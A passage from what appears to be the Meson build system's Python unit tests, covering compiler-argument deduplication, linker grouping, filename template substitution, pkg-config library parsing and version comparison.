a += ['-I./tests2/']
        # Think of this as an assertion; we cannot apply it directly, otherwise the CompilerArgs would already flush the pending changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
        # Then check that, when CompilerArgs already has a built container list, the deduplication picks the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
        # -Wl,-ldl is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
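        # Combined orderings used for the PREFER_STATIC and PREFER_SHARED lookups.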
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
        # This is the priority-ordered list of patterns used when searching for libraries
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
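        # Helper: on macOS an empty file is not accepted as a static library,
        # so compile a trivial object and archive it; elsewhere an empty file
        # is enough for the lookup.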
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
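            # Fake pkg-config output: 'foo' pulls libraries from both prefixes,
            # 'bar' only from the second one, and 'internal' only system libs.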
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
